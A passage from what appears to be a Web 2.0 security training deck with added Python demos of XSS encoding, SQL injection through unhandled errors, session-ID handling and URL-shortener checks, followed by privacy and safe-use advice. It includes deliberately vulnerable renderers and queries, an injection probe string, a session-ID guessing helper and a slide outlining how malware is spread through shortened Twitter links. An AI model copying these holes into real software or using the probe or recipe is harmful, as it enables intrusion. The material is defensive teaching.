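    """Unencoded reflection: whatever the user stored becomes live markup
    in every other user's browser, which is exactly how an XSS worm spreads."""
    return "<div class='about'>" + about_me + "</div>"


def render_profile_safe(about_me: str) -> str:
    """Encode for an HTML text context; quote=True also escapes quotes so
    the same helper is safe inside attribute values."""
    return "<div class='about'>" + html.escape(about_me, quote=True) + "</div>"


def safe_href(url: str) -> str:
    """User-supplied links: allow only http(s); anything else (javascript:,
    data:, vbscript:) is replaced by an inert '#'. Output is attribute-encoded."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(markup: str) -> bool:
    """Crude check used here only to show the difference between the two renderers."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    print(render_profile_vulnerable(HOSTILE_ABOUT_ME))
    print(render_profile_safe(HOSTILE_ABOUT_ME))
    print(safe_href("javascript:alert(1)"), safe_href("https://example.com/a?b=1&c=2"))
```

Encoding is context-specific: html.escape is right for text nodes and quoted attributes, but data placed inside a script block, a URL or a CSS value needs that context's encoder, and a scheme allow-list (not a blocklist) is what keeps javascript: out of href.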
  • 19. Feed Injections
    - New to Web 2.0? Yes
    - Feed aggregators receive data from various untrusted sources. The data can be malicious and exploit users.
    - Remote zone risks: web browsers and web-based readers fall into this category
    - Attacks such as XSS and CSRF are possible
  • 20. Mashup and Widget
    - New to Web 2.0? Yes
    - Mashups and widgets are core components of Web 2.0 sites. The rich functionality they provide can be exploited by attackers through attacks such as XSS.
  • 21. Mashup and Widget (cont'd)
    - The mashup site is the middleman; do you trust it?
    - Multiple inputs, one output
    - Mashup communications could leak data
    - Mashups require cross-domain access
  • 23. Information Leakage
    - New to Web 2.0? No
    - Is this worse in Web 2.0? Yes
    - Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems.
  • 24. Information Leakage (cont'd)
    - A simple lack of error handling leaks information
    - Normal request: http://www.examplesite.com/home.html?day=Monday
    - I add a little something onto the URL: http://www.examplesite.com/home.html?day=Monday AND userscolumn=2
    - No error handling = information leakage. The raw database error comes back to the browser:
      Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
      [Microsoft][ODBC SQL Server Driver][SQL Server] Invalid column name
      /examplesite/login.asp, line 10
    - One error reveals the database vendor, that the query is built from the URL parameter, whether a guessed column exists, and the script path and line number.
  • 25. Information Leakage (cont'd)
    - What makes this worse in Web 2.0?
    - Business logic and validation moved to the client side
    - Web 2.0 apps do a lot of work on the client side: validation of data, business logic, handling of sensitive data
    - You need to back these up with server-side checks
    - Never assume sensitive data will be safe on the client
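Slide 24's error is the classic error-based SQL injection probe, and the cure is two-fold: parameterised queries so the parameter can never alter the statement, and a generic error for the user with the detail kept in the server log. The example below is added here and is not the deck's code; it uses an in-memory SQLite table standing in for examplesite.com's database, so the leaked message reads "no such column" rather than SQL Server's "Invalid column name". The payload is the slide's, with a closing quote added because this query quotes the parameter.

```python
import logging
import sqlite3

log = logging.getLogger("examplesite")

# Assumption: the slide's probe, adapted to a quoted string parameter.
PAYLOAD = "Monday' AND userscolumn=2 --"


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and data standing in for the real site."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE schedule (day TEXT, event TEXT)")
    db.executemany("INSERT INTO schedule VALUES (?, ?)",
                   [("Monday", "Stand-up"), ("Tuesday", "Review")])
    return db


def home_vulnerable(db: sqlite3.Connection, day: str) -> str:
    """String-built SQL, and the raw exception text handed to the browser."""
    try:
        sql = "SELECT event FROM schedule WHERE day = '" + day + "'"
        rows = db.execute(sql).fetchall()
        return ", ".join(r[0] for r in rows)
    except sqlite3.Error as e:
        # Leaks engine, column names and query structure to whoever sent the request.
        return "Error: " + str(e)


def home_hardened(db: sqlite3.Connection, day: str) -> str:
    """Parameterised query: the input is data, never SQL. Details go to the
    server log; the user sees a message that teaches an attacker nothing."""
    try:
        rows = db.execute("SELECT event FROM schedule WHERE day = ?", (day,)).fetchall()
        return ", ".join(r[0] for r in rows)
    except sqlite3.Error as e:
        log.error("schedule lookup failed: %s", e)
        return "Error: request could not be processed"


if __name__ == "__main__":
    db = make_db()
    print(home_vulnerable(db, "Monday"))
    print(home_vulnerable(db, PAYLOAD))   # raw database error reaches the user
    print(home_hardened(db, PAYLOAD))     # nothing matches, nothing leaks
```

With the parameterised query the probe is simply a day name that does not exist, so the response is empty: no error, no column name, no hint that the guess was close.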
  • 26. Authentication and Authorization Flaws
    - New to Web 2.0? No
    - Is this worse in Web 2.0? Yes
    - These flaws can lead to hijacking of user accounts, privilege escalation, undermined authorization and accountability controls, and privacy violations.
  • 27. Authentication and Authorization Flaws (cont'd)
    - Authentication and authorization weaknesses:
      - Passwords with no maximum age and no minimum length or complexity requirements
      - Lack of brute-force protection
      - Broken CAPTCHA systems
      - Security through obscurity
    - Session management weaknesses:
      - Lack of sufficient entropy in session IDs
      - Predictable session IDs
      - Lack of sufficient timeouts and maximum lifetimes for IDs
      - Using one session ID for the whole session (no rotation at login)
  • 28. Authentication and Authorization Flaws (cont'd)
    - What makes this worse in Web 2.0?
    - CAPTCHAs are relied on to provide strong A+A but are often weak
    - More access points in Web 2.0 applications
    - Single sign-on creates a single point of failure
    - Growth in other attacks (XSS, phishing) further undermines A+A
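The four session-management weaknesses on slide 27 map onto four concrete decisions. The added example below (not from the deck) shows a predictable ID scheme and what an attacker does with it, next to a minimal session store that draws IDs from the OS CSPRNG, rotates the ID at login, and enforces both an idle timeout and an absolute lifetime. The timeout values are assumptions.

```python
import secrets
import time
from dataclasses import dataclass
from typing import List, Optional

IDLE_TIMEOUT = 15 * 60         # assumption: 15 minutes without activity ends the session
ABSOLUTE_LIFETIME = 8 * 3600   # assumption: no session outlives 8 hours, active or not


def predictable_session_id(counter: int, now: float) -> str:
    """Weak scheme of the kind the slide warns about: wall-clock seconds plus a sequence number."""
    return f"{int(now)}-{counter}"


def guess_neighbours(observed: str, width: int = 3) -> List[str]:
    """What an attacker does with a predictable ID: enumerate the IDs issued around it."""
    ts, ctr = observed.split("-")
    return [f"{ts}-{int(ctr) + d}" for d in range(-width, width + 1) if d != 0]


@dataclass
class Session:
    user: Optional[str]
    created: float
    last_seen: float


class SessionStore:
    """Unguessable IDs, rotation at login, idle and absolute timeouts."""

    def __init__(self):
        self._sessions = {}

    def create(self, now: float) -> str:
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG, 43 URL-safe chars
        self._sessions[sid] = Session(None, now, now)
        return sid

    def login(self, old_sid: str, user: str, now: float) -> str:
        """Issue a fresh ID when privilege changes, so a pre-login (possibly fixated) ID is useless."""
        old = self._sessions.pop(old_sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = Session(user, old.created if old else now, now)
        return new_sid

    def lookup(self, sid: str, now: float) -> Optional[Session]:
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_LIFETIME:
            del self._sessions[sid]              # expired: forget it rather than revive it
            return None
        s.last_seen = now
        return s


if __name__ == "__main__":
    t = time.time()
    store = SessionStore()
    anon = store.create(t)
    authed = store.login(anon, "alice", t + 1)
    print("pre-login id still valid?", store.lookup(anon, t + 2) is not None)
    print("attacker's guesses for a predictable id:",
          guess_neighbours(predictable_session_id(41, t)))
```

The absolute lifetime is what the slide calls a "maximum lifetime": without it a stolen cookie that is kept warm by periodic requests never expires, however short the idle timeout is.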
  • 29. Insecure Storage and Communications
    - New to Web 2.0? No
    - Is this worse in Web 2.0? Yes
    - These flaws could allow sensitive data to be stolen if appropriate strong protections aren't in place.
  • 30. Insecure Storage and Communications (cont'd)
    - Insecure storage of data:
      - Not encrypting sensitive data
      - Hard-coding keys and/or storing keys insecurely
      - Using broken protection mechanisms (e.g. DES)
      - Failing to rotate and manage encryption keys
    - Insecure communications:
      - Not encrypting sensitive data in transit
      - Only using SSL/TLS for the initial logon request (the session cookie then travels in the clear)
      - Failing to protect keys while in transit
      - Emailing clear-text passwords
  • 31. Insecure Storage and Communications (cont'd)
    - What makes this worse in Web 2.0?
    - More data in more places, including client-side storage
    - Mixing secure and insecure content on a page
    - And now with the Cloud!!!
  • 32. Browsing Habits and Experience have Changed…
    - Trigger finger (clicking on everything). Inboxes contain everything from drink requests to cause requests; do not get into the click habit unless you are ready to deal with drive-by downloads and zero-day attacks.
  • 33. A little on Privacy…
    - 3rd-party apps on Facebook: anyone can create a Facebook app
    - Many of the agreements you must accept give the company the right to monitor your data and sell it without informing you.
    - Tracker information can be built into any application.
    - Mixing personal with professional: commonly on Facebook, where one's friends include business associates, family members and friends.
    - Engaging in Tweet (or Facebook/LinkedIn/MySpace) rage. Imagine you are at a party where everyone is listening, including your boss, spouse and future employer.
  • 34. Privacy (cont'd)
  • 35. Privacy (cont'd)
  • 36. Data = $$$
    - Steal your money directly
    - Sell your data
    - Trick your friends and family into supplying personal data
    - Sell your identity
    - Use your accounts to spread spam, malware and more data-theft scams
    - Sell your organization's data or sensitive information
    - Blackmail individuals and organizations
  • 37. URL Shorteners Risks
    - bit.ly, hex.io, zi.ma, etc.
    - Where will the URL take you?
    - Dubious link via email? Hover your mouse over it or check the HTML
    - A new way for email phishing scams
    - DDoS with iframes
    - Easily escape spam filters
    - Even more dangerous: what if the shortening service itself gets hacked?
    - Use "see before you click" functionality or extensions
    - Example: j.mp
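"See before you click" means asking the shortener where a link goes without actually going there. The added example below (not from the deck) does that with a single HEAD request that is never followed, then classifies the Location header: a chained shortener, a non-http scheme, or a plain destination host. The shortener list is an assumption; the classifier is pure and runs offline on constructed values, while peek_location needs network access.

```python
import http.client
from urllib.parse import urlsplit

# Assumption: a short list of shortener hosts, used to spot redirect chains.
KNOWN_SHORTENERS = {"bit.ly", "j.mp", "tinyurl.com", "t.co"}
DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}


def classify_redirect(short_url: str, location: str) -> str:
    """Turn a Location header into a one-line verdict for the user."""
    if not location:
        return "no redirect"
    target = urlsplit(location)
    if target.scheme.lower() in DANGEROUS_SCHEMES:
        return "dangerous scheme"
    host = (target.hostname or "").lower()
    if host in KNOWN_SHORTENERS:
        return "another shortener (chain)"
    return f"redirects to {host or location}"


def peek_location(url: str, timeout: float = 5.0) -> str:
    """Ask the shortener for its redirect WITHOUT following it.
    http.client never follows redirects, so the destination is never fetched."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=timeout)
    try:
        path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        conn.request("HEAD", path)
        resp = conn.getresponse()
        if 300 <= resp.status < 400:
            return resp.getheader("Location", "")
        return ""
    finally:
        conn.close()


def see_before_you_click(short_url: str) -> str:
    """One hop only; a chain result tells the user to repeat, not to trust."""
    return classify_redirect(short_url, peek_location(short_url))


if __name__ == "__main__":
    # Offline demonstration on constructed Location values.
    for loc in ("https://www.example.org/page", "http://j.mp/def", "javascript:alert(1)", ""):
        print(repr(loc), "->", classify_redirect("http://bit.ly/abc", loc))
```

Resolving only one hop at a time is deliberate: following a chain automatically would re-create the risk the slide describes, since the final hop is where a hacked shortener or a malware page would sit.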
  • 38. Malware example: Koobface
    - The Koobface worm and its associated botnet have gained notoriety in security circles for their longevity and history of targeting social networking sites. First surfacing in 2008 on MySpace and Facebook, the worm resurfaced in early 2009, this time targeting Twitter users.
    - Using phishing techniques, the message directs recipients to a third-party website, where they are prompted to download what is purported to be an update of the Adobe Flash player.
    - 11/10/2009: as part of a new Koobface attack, links to Google Reader URLs controlled by cyber-criminals are being spammed by Koobface onto social network sites, including Facebook and MySpace. The hundreds of Google accounts involved host a page with a fake YouTube video. Attempts to view this supposed video expose Windows users to infection by Koobface.
    - Upon successful infection, Koobface attempts to gather sensitive information from victims, such as credit card numbers.
  • 39. Facebook Widget Installing Spyware
    - Prompts users to install the infamous "Zango" adware/spyware.
  • 40. Twitter hacking example:
    - Select a victim group using any one of a number of Twitter trend tools.
    - Select malware based on device or location info.
    - Upload the malware to dropbox.com and request a public link for the uploaded file.
    - Use a URL shortening service to obfuscate the URL.
    - Send a tweet to the target referencing the information, or post with keywords so that all individuals "tracking" the keywords are notified of a new tweet on the subject they are tracking.
  • 41. Scareware Tweets
    - Scareware is fake anti-virus: instead of protecting your computer it infects it
    - Scammers create multiple tweets that direct you to a scareware page. They then try to frighten you into believing you have a security problem and need their software to address it
    - Other scareware attacks aim to: take control of your computer to send spam; hold your computer to ransom
    - Result: malware infection
  • 42. Security analysis difficulties with Web 2.0
    - More code and complexity in Web 2.0 apps
    - At least two languages to analyze (client and server)
    - User-supplied code might never be reviewed
    - Dynamic nature increases the risk of missing flaws
    - Increased number of input points
  • 43. Basics of Social Networking Security
    - Never post personal information online
      - Everything you post is public information
      - If you don't feel comfortable with everyone seeing it, then don't put it online
    - Configure security settings on all sites
      - Most websites you log into have security configurations
      - Set the privacy levels according to what you are posting
    - Change your password regularly
      - Use phrases, not words
      - Do not keep a "master" password
    - Never trust e-mails asking for personal information
      - An official organization will never ask you to disclose private information in order to correct an error
  • 44. Basics of Social Networking Security (cont'd)
    - Do not friend anyone you do not know and trust
      - Hackers and spammers are more clever than you think. There is a reason many online scams are called "social engineering"
      - Clean out your friend list regularly
    - Watch for hacked friend accounts
      - Unusual posts or requests
      - Posting "shock sites"
    - Beware of third-party apps
      - Many require you to sign an agreement giving them the right to sell your information
      - Malicious code can be written into the program
    - Delete unused apps
      - If you are not using them, then why let them potentially mine data about you?
      - If you are unsure about an app, a post or anything else, then Google is your best friend
  • 45. Basics of Social Networking Security (cont'd)
    - Be cautious about posting your location online
      - People are watching where you will be and, more importantly, where you will not be
    - Check your security settings monthly
      - Facebook sets all profiles to public with each site redesign
      - Apps may disable your security settings
      - Viruses and malware may disable your security settings
    - Consider using private browsing
      - Private browsing lets you view websites without storing your history or keeping cookies after the session
      - Private browsing shortcuts: Firefox – Ctrl+Shift+P; Internet Explorer 8 – Ctrl+Shift+P; Opera – Ctrl+Shift+N; Google Chrome – Ctrl+Shift+N
    - Don't stay logged on
  • 46. Basics of Social Networking Security (cont'd)
    - Set your settings to high privacy and/or enable security settings on the sites you use.
    - Review a given website's privacy policy; you may be surprised at what you are actually agreeing to.
    - Log off when you leave.
    - Install and update antivirus software.
    - Keep system software AND applications up to date.
    - Make sure the connection you use is secure.
  • 47. ? ? ? ? ? ? ? ? ? ? (questions)